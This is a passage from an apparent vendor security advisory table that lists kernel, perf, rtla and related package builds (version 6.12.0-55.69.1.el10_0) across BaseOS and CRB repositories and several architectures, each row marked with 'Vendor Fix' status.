| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
